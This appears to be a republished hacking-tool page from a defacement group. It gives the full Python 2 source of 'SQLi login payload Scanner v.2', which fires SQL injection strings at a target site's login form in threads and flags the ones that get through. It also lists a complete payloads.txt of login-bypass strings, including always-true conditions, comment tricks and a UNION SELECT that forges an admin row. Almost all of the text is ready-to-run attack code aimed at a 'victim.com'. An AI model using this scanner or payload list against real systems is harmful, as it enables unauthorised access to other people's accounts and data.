SQLi login payload Scanner v.2.
System requrements : WIndows 7/Vista/8.1/10, Ubuntu 14.04, Kali Linux 2.0 Black Arch Linux.
Requirements (you can install manually using pip):
+ Python 2.6 – 2.7
– cookielib
– urllib2
– urllib
– argparse
– sys
– threading
– termcolor
– cookielib
payloader.py Script:
#!/usr/bin/python # -*- coding: utf-8 -*- import urllib import urllib2 import re import argparse import sys import threading from termcolor import colored from cookielib import CookieJar request_headers = { "Accept-Language" : "en-US,en;q=0.5", "User-Agent" : "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Referer" : "http://fbi.gov", "Connection" : "keep-alive" } about = colored(""" ----------------------------------------- -- -- -- SQLi login payload Scanner. v.2 -- -- -- -- Camoufl4g3 -- -- -- -- Azdefacers.org -- -- Select the option -help for help -- ----------------------------------------- """,'green') #--------------------------------------------------- Scan function ------------------------------------------------- print about def PayloadScan(target,username,password,exception,payload): try: request = urllib2.Request(target,headers=request_headers) cj = CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) data = urllib.urlencode({username:payload,password:payload}) u = opener.open(target, data) getcode = u.getcode() match = re.findall(r'{}'.format(exception),u.read()) if(match): print "%s %s" % (payload,colored('[-]','red')) else: print "%s %s" % (payload,colored('[+]','green')) except KeyboardInterrupt: print 'stopped' def Main(): parser = argparse.ArgumentParser() parser.add_argument('-t', action = "store", #stored dest = "target", #type = "string", #int tipi help = "for example: ./bruteforce.py -t victim.com") parser.add_argument('-uc', action = "store", #stored dest = "uc", #type = "string", #int tipi help = "for example: ./bruteforce.py -uc username column") parser.add_argument('-pc', action = "store", #stored dest = "pc", #type = "string", #int tipi help = "for example: ./bruteforce.py -pc password column") parser.add_argument('-exception', action = "store", #stored dest = "exception", #type = "string", #int tipi help = "for example: ./bruteforce.py -a exception word") args = parser.parse_args() if args.target: print("# Creating target " + args.target) if args.uc: print("# Creating user column " + args.uc) if args.pc: print("# Creating password column " + args.pc) if args.exception: print("# Creating exception " + args.exception) target = args.target print '--------------------------------------------' try: f = open("payloads.txt","r") except IOError: sys.exit('File doesn\'t exist!') threads = [] for line in f.readlines(): t = threading.Thread(target = PayloadScan, args = (target,args.uc,args.pc,args.exception,line.rstrip('\n'))) threads.append(t) t.start() if __name__ == "__main__": Main()
payloads.txt Script:
'-' ' ' '&' '^' '*' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' "-" " " "&" "^" "*" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Source : https://github.com/camoufl4g3